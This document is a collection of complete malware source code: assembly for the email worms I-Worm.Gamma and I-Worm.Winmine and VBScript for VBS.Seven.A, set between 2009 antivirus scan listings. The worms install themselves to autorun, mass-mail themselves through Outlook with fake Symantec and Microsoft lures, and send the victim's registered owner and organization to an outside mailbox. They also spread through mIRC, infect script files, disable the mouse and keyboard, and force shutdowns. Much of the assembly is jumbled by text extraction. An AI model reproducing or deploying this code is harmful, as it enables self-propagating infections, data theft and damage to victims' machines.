File Kodak.doc received on 05.16.2009 17:43:05 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Adok!IK AhnLab-V3 5.0.0.2 2009.05.16 W97M/Adok AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord Authentium 5.1.2.4 2009.05.16 W97M/Adok.A Avast 4.8.1335.0 2009.05.15 MW97:Adok-A AVG 8.5.0.336 2009.05.15 W97M/Ethan BitDefender 7.2 2009.05.16 W97M.Kdk.A CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M ClamAV 0.94.1 2009.05.16 WM.Psycho Comodo 1157 2009.05.08 Virus.MSWord.Adok DrWeb 5.0.0.12182 2009.05.16 W97M.Petik eSafe 7.0.17.0 2009.05.14 O97M.GNcc eTrust-Vet 31.6.6508 2009.05.16 W97M/Adok.A F-Prot 4.4.4.56 2009.05.16 W97M/Adok.A F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Adok Fortinet 3.117.0.0 2009.05.16 W97M/Adok.A GData 19 2009.05.16 W97M.Kdk.A Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Adok K7AntiVirus 7.10.737 2009.05.16 Macro.Adok Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Adok McAfee 5616 2009.05.15 W97M/Generic McAfee+Artemis 5616 2009.05.15 W97M/Generic McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A Microsoft 1.4602 2009.05.16 Virus:W97M/Adok.A NOD32 4080 2009.05.15 W97M/Adok.A Norman 6.01.05 2009.05.16 W97M/Adok.A nProtect 2009.1.8.0 2009.05.16 W97M.Kdk.A Panda 10.0.0.14 2009.05.16 W97M/Kodak.worm PCTools 4.4.2.0 2009.05.16 WORD.97.Adok.A Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Macro.Word97.Adok Sophos 4.41.0 2009.05.16 WM97/Adok-A Sunbelt 3.2.1858.2 2009.05.16 W97M.Adok (v) Symantec 1.4.4.12 2009.05.16 W97M.Adok.A TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico TrendMicro 8.950.0.1092 2009.05.15 W97M_ABOTUS.A VBA32 3.12.10.5 2009.05.16 Virus.W97M.Ethan ViRobot 2009.5.15.1737 2009.05.15 W97M.Adok VirusBuster 4.6.5.0 2009.05.16 WORD.97.Adok.A Additional information File size: 31232 bytes MD5...: 84a74bcf024ac4779d20e2b667bc6da6 SHA1..: 99cbae9ae51381d5f7eb637b12d42e790f48db33

comment # Name : I-Worm.Gamma (w32gammaworm) Author : PetiK Date : May 29th - June 9th Size : 8704 bytes Action : Check if the file is /WINDOWS/SYSTEM.SETUP.EXE. Whether it's not this file, it will copies to /WINDOWS/SYSTEM.SETUP.EXE. It alters the run= line in the Win.ini file to the name of the copy. It displays a message. Otherwise, he create C:\gamma and copies it to C:\mirc, C:\mirc32, C:\progra~1\mirc or C:\progra~1\mirc32. After, it creates C:\Data and put a file info.vbs. This file send a message to gamma@multimania.com : Subject : Message from + Name of the registered user Body : Time, Date, Organization I-Worm.Gamma On the 5th, when the day is Wednesday, a message is displayed. When the user click on "OK", the worm swap the buttons of the mouse. The worms waits for an active Internet connection and tries to establish one by attemping to www.symantec.com. When the connection is successful, it scans all *.*htm* file in "Temporary Inetrnet Files" to find email adresses. When the worms finds it, it sends a copy of him to the address : From : snd @symantec.com Date : 06/06/2001 Subject : Virus/Worms Fix from Symantec Corporation (Norton Antivirus) Body : Hi, Symantec Corporation send you the last version of our tool Virus/Worms Fix. Here is the version 3.1 . This tool detect, repair and protect users against Bloodhound.IRC.Worm, Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro . With Regards, Symantec Corporation (http://www.symantec.com) Attachment : SETUP.EXE # .586p .model flat,stdcall include useful.inc extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn CloseHandle:PROC CopyFileA:PROC CreateDirectoryA:PROC CreateFileA:PROC CreateFileMappingA:PROC DeleteFileA:PROC ExitProcess:PROC FindClose:PROC FindFirstFileA:PROC FindNextFileA:PROC gethostbyname:PROC GetFileSize:PROC GetModuleFileNameA:PROC GetModuleHandleA:PROC GetSystemDirectoryA:PROC GetSystemTime:PROC GetWindowsDirectoryA:PROC lstrcat:PROC lstrcmp:PROC MAPILogoff:PROC MAPILogon:PROC MAPISendMail:PROC MapViewOfFile:PROC MessageBoxA:PROC RegCloseKey:PROC RegOpenKeyExA:PROC RegQueryValueExA:PROC SetCurrentDirectoryA:PROC Sleep:PROC SwapMouseButton:PROC UnmapViewOfFile:PROC WinExec:PROC WriteFile:PROC

extrn WritePrivateProfileStringA:PROC .data szComName szOrig szWinini szTif FileHandle RegHandle SrchHandle octets ValueType mail_address MAPISession

db db db db dd dd dd dd dd db dd

50 dup (0) 50 dup (0) 50 dup (0) 7Fh dup (0) ? ? ? ? 0 128 dup (?) 0

DIR db "C:\Data",00h information db "C:\Data\info.vbs",00h infoexec db "wscript C:\Data\info.vbs",00h mirc db "C:\gamma",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h script3 db "C:\progra~1\mirc\script.ini",00h script4 db "C:\progra~1\mirc32\script.ini",00h Copie db "\SETUP.EXE",00h Winini db "\\WIN.INI",00h run db "run",00h windows db "windows",00h TEXTE db "This file does not appear to be a Win32 valid file. ",00h TITRE2 db "I-Worm.Gamma (c)2001",00h TEXTE2 db "PetiK greets you",00h symantec db "www.symantec.com",00h tempnetfile db "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",00h Value db "Cache",00h FICHIER db "*.*htm*",00h CREATE_NEW CREATE_ALWAYS FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_NORMAL FILE_MAP_READ FILE_SHARE_READ GENERIC_READ GENERIC_WRITE HKEY_USERS KEY_QUERY_VALUE KEY_SET_VALUE MAX_PATH OPEN_EXISTING PAGE_READONLY REG_SZ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ 00000001h 00000002h 00000001h 00000080h 00000004h 00000001h 80000000h 40000000h 80000003h 00000001h 00000002h 260 00000003h 00000002h 00000001h

SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMillisecond WORD ? SYSTIME ends SystemTime SYSTIME <> time struc LowDateTime dd HighDateTime time ends win32 struc FileAttributes CreationTime LastAccessTime LastWriteTime FileSizeHifh FileSizeLow dd Reserved0 dd Reserved1 dd ? dd ? dd ? time ? time ? time ? dd ? ? ? ?

FileName dd MAX_PATH (?) AlternativeFileName db 13 dup (?) db 3 dup (?) win32 ends CHERCHE win32 <> mircd: db "[script]",0dh,0ah db ";Don't delete this file",0dh,0ah db "n0=ON 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick " szCopie db 50 dup (0) db "",0dh,0ah db "n3=}",0dh,0ah MIRCTAILLE equ $-mircd infod: db ''' Symantec ScriptBlocking Authenticated File',0dh,0ah db ''' A3C7B6E0-5535-11D5-911D-444553546170',0dh,0ah db '',0dh,0ah db 'On Error Resume Next',0dh,0ah db 'set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'set w=CreateObject("WScript.Shell")',0dh,0ah db 'If w.RegRead("HKLM\Software\Gamma\") <> "OK" Then',0dh,0ah db 'set o=CreateObject("Outlook.Application")',0dh,0ah db 'set m=o.CreateItem(0)',0dh,0ah db 'n=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")',0dh,0ah db 'p=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")',0d h,0ah db 'm.To = "gammaworm@multimania.com"',0dh,0ah db 'm.Subject = "Message from " & n',0dh,0ah db 's = "Time : " & time',0dh,0ah db 's = s & vbCrLf & "Date : " & date',0dh,0ah db 's = s & vbCrLf & "Organization : " & p',0dh,0ah db 's = s & vbCrLf & vbCrLf & " I-Worm.Gamma"',0dh,0ah db 'm.Body = s',0dh,0ah db 'm.DeleteAfterSubmit=True',0dh,0ah db 'm.Send',0dh,0ah db 'w.RegWrite "HKLM\Software\Gamma\", "OK"',0dh,0ah db 'End If',0dh,0ah INFOTAILLE equ $-infod Email dd dd dd dd dd dd dd dd dd dd dd dd MelFrom dd dd dd dd dd MelTo dd dd dd dd dd dd Attach dd dd dd dd dd ? offset offset ? offset ? 2 offset 1 offset 1 offset

Subject Message DateS MelFrom MelTo Attach

dd ? ? offset MelFrom offset sAddr ? ? ? 1 offset MelTo offset mail_address ? ? dd ? ? ? offset szOrig ? ?

Subject db "Virus/Worms Fix from Symantec Corporation (Norton Antivirus)",00h Message db "Hi,",0dh,0ah,0dh,0ah db "Symantec Corporation send you the last version of our tool Virus/Worms Fix. " db "Here is the version 3.1 .",0dh,0ah db "This tool detect, repair and protect users against Bloodhound.IRC.Worm, " db "Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .",0dh,0ah,0dh,0ah db 09h,09h,"With Regards,",0dh,0ah db 09h,09h,"Symantec Corporation (http://www.symantec.com)",00h DateS db "06/06/2001",00h sAddr db "snd@symantec.com",00h .code DEBUT: VERIF: call push push push call push push call push push call push push call test jz

push 00h GetModuleHandleA 50 offset szOrig eax GetModuleFileNameA 50h offset szCopie GetSystemDirectoryA offset Copie offset szCopie lstrcat offset szOrig offset szCopie lstrcmp eax,eax MIRC

COPIE: push 00h push offset szCopie push offset szOrig call CopyFileA WININI: push call push push call push push push push call push 50 offset szWinini GetWindowsDirectoryA offset Winini offset szWinini lstrcat offset szWinini offset szCopie offset run offset windows WritePrivateProfileStringA

MESSAGE:push 1010h push offset szOrig push offset TEXTE push 00h call MessageBoxA jmp FIN MIRC: push push push push push push push call mov push push push push push call push call C_MIRC: 00h FILE_ATTRIBUTE_READONLY CREATE_ALWAYS 00h FILE_SHARE_READ GENERIC_WRITE offset mirc CreateFileA [FileHandle],eax 00h offset octets MIRCTAILLE offset mircd [FileHandle] WriteFile [FileHandle] CloseHandle push 00h

push push call push push push call push push push call push push push call INFO: push call push push push push push push push call cmp je mov push push push push push call push call push push call DATE: push call cmp jne cmp jne push push push push call push call jmp

offset script1 offset mirc CopyFileA 00h offset script2 offset mirc CopyFileA 00h offset script3 offset mirc CopyFileA 00h offset script4 offset mirc CopyFileA offset DIR CreateDirectoryA 00h FILE_ATTRIBUTE_NORMAL CREATE_NEW 00h FILE_SHARE_READ GENERIC_WRITE offset information CreateFileA eax,-1 DATE [FileHandle],eax 00h offset octets INFOTAILLE offset infod [FileHandle] WriteFile [FileHandle] CloseHandle 01h offset infoexec WinExec offset SystemTime GetSystemTime [SystemTime.wDayOfWeek],03h NET [SystemTime.wDay],05h NET 40h offset TITRE2 offset TEXTE2 00h MessageBoxA 01h SwapMouseButton NET

PAUSE: push 60 * 3 * 1000 call Sleep NET: push call test jz push push push push push call test jnz push push push push push offset symantec gethostbyname eax,eax PAUSE offset RegHandle KEY_QUERY_VALUE 00h offset tempnetfile HKEY_USERS RegOpenKeyExA eax,eax FIN 7Fh offset szTif offset ValueType 00h offset Value

TIF:

push [RegHandle] call RegQueryValueExA push [RegHandle] call RegCloseKey TIFCH: push offset szTif call SetCurrentDirectoryA FFF: push push call cmp je mov cHTML: FNF: push push call dec jnz FC: push call END_S: FIN: offset CHERCHE offset FICHIER FindFirstFileA eax,-1 FC [SrchHandle],eax call HTML offset CHERCHE [SrchHandle] FindNextFileA eax cHTML [SrchHandle] FindClose popad

push 00h call ExitProcess

HTML: pushad push 00h push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 00h push FILE_SHARE_READ push GENERIC_READ push offset CHERCHE.FileName call CreateFileA inc eax je END_S dec eax xchg eax,ebx xor push push push push push push call test jz xor push push push push push call test jz xchg eax,eax eax eax eax PAGE_READONLY eax ebx CreateFileMappingA eax,eax FERME1 eax,eax eax eax eax FILE_MAP_READ ebp MapViewOfFile eax,eax FERME2 eax,esi

push 00h push ebx call GetFileSize xchg eax,ecx jecxz FERME3 ls_s_m: db @mt: l_s_m: push pop rep call @mt 'mailto:' pop edi pushad 07h ecx cmpsb

popad je s_m inc esi loop l_s_m FERME3: push esi call UnmapViewOfFile FERME2: push ebp call CloseHandle FERME1: push ebx call CloseHandle popad ret s_m: xor edx,edx add esi,7 mov edi,offset mail_address push edi lodsb cmp al,' ' je s_c cmp al,'"' je e_c cmp al,'''' je e_c cmp al,'@' jne o_a inc edx stosb jmp n_c inc esi jmp n_c xor al,al stosb pop edi test edx,edx je ls_s_m xor eax,eax dword ptr [MAPISession] eax eax eax ; password eax ; username eax MAPILogon

n_c:

o_a: s_c: e_c:

mapiln: push push push push push push call

mapism: xor eax,eax push eax push eax push offset Email push eax push word ptr [MAPISession] call MAPISendMail mapilf: push push push push call jmp xor eax,eax eax eax eax dword ptr [MAPISession] MAPILogoff ls_s_m

end DEBUT

File Gamma.exe received Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

on 05.16.2009 11:58:18 (CET) Version Last Update 4.0.0.101 2009.05.16 5.0.0.2 2009.05.15 7.9.0.168 2009.05.15 2.0.3.1 2009.05.15 5.1.2.4 2009.05.15 4.8.1335.0 2009.05.15 8.5.0.336 2009.05.15 7.2 2009.05.16 10.00 2009.05.15 0.94.1 2009.05.15 1157 2009.05.08 5.0.0.12182 2009.05.16 7.0.17.0 2009.05.14 31.6.6508 2009.05.16 4.4.4.56 2009.05.15 8.0.14470.0 2009.05.15 3.117.0.0 2009.05.16 19 2009.05.16 T3.1.1.49.0 2009.05.16 7.10.735 2009.05.14 7.0.0.125 2009.05.16 5616 2009.05.15 5616 2009.05.15 6.7.6 2009.05.15 1.4602 2009.05.16 4080 2009.05.15 6.01.05 2009.05.16 2009.1.8.0 2009.05.16 10.0.0.14 2009.05.16 4.4.2.0 2009.05.15 3.0 2009.05.16 21.29.52.00 2009.05.16 4.41.0 2009.05.16 3.2.1858.2 2009.05.16 1.4.4.12 2009.05.16 6.3.4.1.326 2009.05.15 8.950.0.1092 2009.05.15 3.12.10.5 2009.05.16 2009.5.15.1737 2009.05.15 4.6.5.0 2009.05.15

Result Email-Worm.Win32.Petik!IK Win32/PetTick.8704 Worm/Petik.AV.09 Worm/Win32.Win32 W32/Malware!d62f Win32:Gamma I-Worm/Petik Win32.Petik.C@mm Worm.Petik.AV.09 Worm.Win32.Petik.C Win32.Petik.8704 Win32/Mania W32/Malware!d62f Email-Worm.Win32.Petik W32/PetTick.D@mm Win32.Petik.C@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.AV.09 Worm:Win32/Petik.C@mm Win32/Petik.C W32/Pet_Tick.8704.A DDoS/Petik.C I-Worm.Gamma.A Worm.Mail.Petik.g W32/Gamma BehavesLike.Win32.Malware (v) W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.D OScope.Dialer.GMHA I-Worm.Win32.PetTick.8704.A I-Worm.Gamma.A

Additional information File size: 8704 bytes MD5...: 997ae169da2f57e7e48e6862eb70223a SHA1..: b7349d6e5c65551d1162597cf4871b0c8e04e6b1

comment # Name : I-Worm.Winmine Author : PetiK Date : June 12th - June 15th Size : 6656 bytes Action : Check if the file is run from the SYSTEM folder. If so, it creates a file with the name "C:\ENVOIE_VBS.vbs" to spread with Outlook : Subject : Is the work so hard ?? Body : Relax you with the last version of <Winmine>. Attached : WINMINE.EXE It chages the start page of Internet Explorer by "http://perso.libertysurf.fr/dacruz/mayaindex.html" If the current day is the 15th, it displays a message and swaps the buttons of the mouse. After five minutes, the worms stops the computer. Otherwise, it copies itself to SYSTEM folder, alters the load= line in WIN.INI file to run when the computer starts and displays a message box. # .586p .model flat .code callx macro a extrn a:proc call a endm DEBUT: VERIF: push 00h callx GetModuleHandleA push 50 push offset szOrig push eax callx GetModuleFileNameA push 50h push offset szCopie callx GetSystemDirectoryA push offset Copie push offset szCopie callx lstrcat push offset szOrig push offset szCopie callx lstrcmp test eax,eax jz SEND COPIE: push 00h push offset szCopie push offset szOrig callx CopyFileA WININI: push 50 push offset szWinini callx GetWindowsDirectoryA push offset Winini push offset szWinini callx lstrcat push offset szWinini push offset szCopie push offset load push offset windows callx WritePrivateProfileStringA MESSAGE:push 1040h push offset TITRE push offset TEXTE push 00h callx MessageBoxA jmp FIN SEND: push 00h push FILE_ATTRIBUTE_READONLY

GO:

push CREATE_NEW push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset vbssend callx CreateFileA cmp eax,-1 je GO mov [FileHandle],eax push 00h push offset octets push VBSTAILLE push offset vbsd push [FileHandle] callx WriteFile push [FileHandle] callx CloseHandle push 01h push offset onyva callx WinExec

DLL:

push offset dllName callx LoadLibraryA test eax,eax jz DATE mov hdll,eax push offset FunctionName push hdll callx GetProcAddress test eax,eax jz DATE mov setvalue,eax REG: push 08h push offset start_page push 01h push offset start_key push offset main_s push HKEY_CURRENT_USER call [setvalue] FINDLL: push [hdll] callx FreeLibrary DATE: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDay],0Fh jne FIN push 40h push offset TITRE2 push offset TEXTE2 push 00h callx MessageBoxA push 01h callx SwapMouseButton push 60 * 5 * 1000 callx Sleep push EWX_SHUTDOWN callx ExitWindowsEx FIN: push 00h callx ExitProcess

.data szCopie szOrig szWinini FileHandle octets hdll setvalue Copie vbssend onyva Winini load windows

db db db dd dd dd dd db db db db db db

50 dup (0) 50 dup (0) 50 dup (0) ? ? ? ? "\WINMINE.EXE",00h "C:\ENVOIE_VBS.vbs",00h "wscript C:\ENVOIE_VBS.vbs",00h "\\WIN.INI",00h "load",00h "windows",00h

TITRE TEXTE Corporation",00h TITRE2 TEXTE2 main_s start_key start_page dllName FunctionName wormname

db "Winmine - Microsoft Corporation (R)",00h db "The last update of the game ""Winmine"" written by Microsoft db db db db db db db db "I-Worm.Winmine",00h "By PetiK (c)2001",00h "Software\Microsoft\Internet Explorer\Main",00h "Start Page",00h "http://perso.libertysurf.fr/dacruz/mayaindex.html",00h "SHLWAPI.dll",00h "SHSetValueA",00h "I-Worm.Winmine by PetiK",00h

vbsd: db 'On Error Resume Next',0dh,0ah db 'Set A=CreateObject("Outlook.Application")',0dh,0ah db 'Set B=A.GetNameSpace("MAPI")',0dh,0ah db 'For Each C In B.AddressLists',0dh,0ah db 'If C.AddressEntries.Count <> 0 Then',0dh,0ah db 'For D=1 To C.AddressEntries.count',0dh,0ah db 'Set E=C.AddressEntries(D)',0dh,0ah db 'Set F=A.CreateItem(0)',0dh,0ah db 'F.To=E.Address',0dh,0ah db 'F.Subject="Is the work so hard ??"',0dh,0ah db 'F.Body="Relax you with the last version of <Winmine>."',0dh,0ah db 'Set G=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'F.Attachments.Add G.BuildPath(G.GetSpecialFolder(1),"Winmine.exe")',0dh,0ah db 'F.DeleteAfterSubmit=True',0dh,0ah db 'If F.To <> "" Then',0dh,0ah db 'F.Send',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',00h VBSTAILLE equ $-vbsd CREATE_NEW FILE_ATTRIBUTE_READONLY FILE_SHARE_READ GENERIC_WRITE HKEY_CURRENT_USER EWX_SHUTDOWN SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMillisecond WORD ? SYSTIME ends SystemTime SYSTIME <> end DEBUT end equ equ equ equ equ equ 00000001h 00000001h 00000001h 40000000h 80000001h 00000001h

File Winmine.exe received on 05.10.2009 23:52:01 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6497 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.729 7.0.0.125 5611 5611 6.7.6 1.4602 4063 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.28.62.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 3.12.10.4 2009.5.9.1727 4.6.5.0 Last Update 2009.05.10 2009.05.09 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.10 2009.05.09 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.08 2009.05.10 2009.05.09 2009.05.10 2009.05.10 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.10 2009.05.10 2009.05.08 2009.05.08 2009.05.10 2009.05.10 2009.05.07 2009.05.10 2009.05.10 2009.05.10 2009.05.09 2009.05.10 2009.05.09 2009.05.08 2009.05.09 2009.05.09 2009.05.10 Result Email-Worm.Win32.Petik!IK Win32/Petik.worm.6656 Worm/Petik.AV.02 Worm/Win32.Win32 W32/Malware!cc55 Win32:Petik-Winmine I-Worm/Petik Generic.Malware.Msp!.4B5A9B45 Worm.Win32.Petik.B Win32.Petik.6656 Win32/Petik.6656.C W32/Malware!cc55 Email-Worm.Win32.Petik W32/Petik!worm Generic.Malware.Msp!.4B5A9B45 Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Worm.Petik.AV.02 Worm:Win32/Pet_tik.G@mm Win32/Petik.B W32/Pet_Tick.6656.C Worm/W32.Petik.6656 W32/Petik I-Worm.Petik.H Medium Risk Malware Trojan.WINMINE W32/Winmine BehavesLike.Win32.Malware (v) W32/PetTick@MM WORM_MINEUP.A Win32.Worm.Petik.8192 I-Worm.Petik.H

Additional information File size: 6656 bytes MD5...: 23f6db768eacfa01a352a657acb26c9b SHA1..: bc83ebddddead5521afeefd9e9df47e342f05153

' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

Name : VBS.Seven.A Author : PetiK Date : June 16th 2001 Size : 3626 byte Action : It copies itself to \WINDOWS\Seven.vbs, \WINDOWS\SYSTEM\Envy.vbs, and \WINDOWS\TEMP\Lust.vbs. It adds values in Run key (Envy) and in Runservices key (Lust). When the current day is 1st, 15th or 30th it adds value in Run key of HKCU (Anger=rundll32 mouse,disable). That disable the mouse in each start. When the current day is 12th or 28th it displays a message box. It closes Windows when the user click on “OK”. When the day is 14th it shows an other message it displays a message. When the user click on “OK”, the worm disables the keyboard. when the day is 5th or 17th, it changes some values in regedit. When the user want open a TXT file, “\WINDOWS\Seven.vbs” starts. The VBS icon is replaced by the TXT icon. It infects after all VBS files that it founds on the disk and adds some at the end of the file to run \WINDOWS\Seven.vbs when the file is ran. The worm ues Outlook to spread too : Subject : What is the seven sins ?? Body : Look at this file and learn them. Attached : Seven.vbs

'VBS.Seven.A On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set tmp=fso.GetSpecialFolder(2) SEVEN() Sub SEVEN() Set org=fso.GetFile(WScript.ScriptFullname) org.Copy(win&"\Seven.vbs") org.Copy(sys&"\Envy.vbs") org.Copy(tmp&"\Lust.vbs") run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Envy") runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Lust") ws.RegWrite run,sys&"\Envy.vbs" ws.RegWrite runs,tmp&"\Lust.vbs" First() Second() Third() Disk() Send() End Sub Sub First() If Day(Now)=1 or Day(Now)=15 or Day(Now)=30 Then run2=("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Anger") ws.RegWrite run2,"rundll32 mouse,disable" End If End Sub Sub Second() If Day(Now)=12 or Day(Now)=28 Then MsgBox "You're tired now"+VbCrLf+"Switch off you're Computer",vbExclamation,"Seven" ws.Run "rundll32.exe user.exe,exitwindows" End If If Day(Now)=14 Then MsgBox "The keyboard is on strike !",vbInformation,"Seven" ws.Run "rundll32 keyboard,disable" End If End Sub Sub Third() If Day(Now)=5 or Day(Now)=17 Then bur=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Sh ell Folders\Desktop") if not fso.FileExists(win&"\COPYRIGHT.txt.vbs") Then txt=ws.RegRead("HKCR\txtfile\shell\open\command\") ws.RegWrite "HKCR\txtfile\shell\open\command\Pride",txt ws.RegWrite "HKCR\txtfile\shell\open\command\","wscript "&win&"\Seven.vbs" icot=ws.RegRead("HKCR\txtfile\DefaultIcon\") icov=ws.RegRead("HKCR\VBSfile\DefaultIcon\")

ws.RegWrite "HKCR\VBSfile\DefaultIcon\oldicon",icov ws.RegWrite "HKCR\VBSfile\DefaultIcon\",icot Set copy=fso.CreateTextFile (bur&"\COPYRIGHT.txt.vbs") copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" (c)2001"",vbcritical,""VBS.Seven.A""" copy.Close Set copy=fso.CreateTextFile (win&"\COPYRIGHT.txt.vbs") copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" (c)2001"",vbcritical,""VBS.Seven.A""" copy.Close end if End If End Sub Sub Disk Set dr=fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then list(d.path&"\") end If Next End Sub Sub infect(dossier) Set f=fso.GetFolder(dossier) Set fc=f.Files For each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) If (ext="vbs") Then Set cot=fso.OpenTextFile(f1.path, 1, False) If cot.ReadLine <> "'VBS.Seven.A" then cot.Close Set cot=fso.OpenTextFile(f1.path, 1, False) vbsorg=cot.ReadAll() cot.Close Set inf=fso.OpenTextFile(f1.path,2,True) inf.WriteLine "'VBS.Seven.A" inf.Write(vbsorg) inf.WriteLine "" inf.WriteLine "Set w=CreateObject(""WScript.Shell"")" inf.WriteLine "Set f=CreateObject(""Scripting.FileSystemObject"")" inf.WriteLine "w.run f.GetSpecialFolder(0)&""\Seven.vbs""" inf.Close End If End If Next End Sub Sub list(dossier) Set f=fso.GetFolder(dossier) Set sf=f.SubFolders For each f1 in sf infect(f1.path) list(f1.path) Next End Sub Sub Send() Set A=CreateObject("Outlook.Application") Set B=A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.count Set E=C.AddressEntries(D) Set F=A.CreateItem(0) F.To=E.Address F.Subject="What is the seven sins ??" F.Body="Look at this file and learn them." Set G=CreateObject("Scripting.FileSystemObject") F.Attachments.Add G.BuildPath(G.GetSpecialFolder(0),"Seven.vbs") F.DeleteAfterSubmit=True If F.To <> "" Then F.Send End If Next End If Next End Sub

By PetiK

By PetiK

File Seven.vbs received on 05.16.2009 19:29:21 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Petik!IK VBS/Petik Worm/Petik.I Worm/Win32.Petik VBS/Petik.S@mm VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.9CAAED1A VBS.Petik.I Worm.Petik.I Unclassified Malware VBS.Petik VBS.SillyWorm. VBS/Chism VBS/Petik.S@mm Email-Worm.Win32.Petik.i VBS/Petik.I Generic.ScriptWorm.9CAAED1A 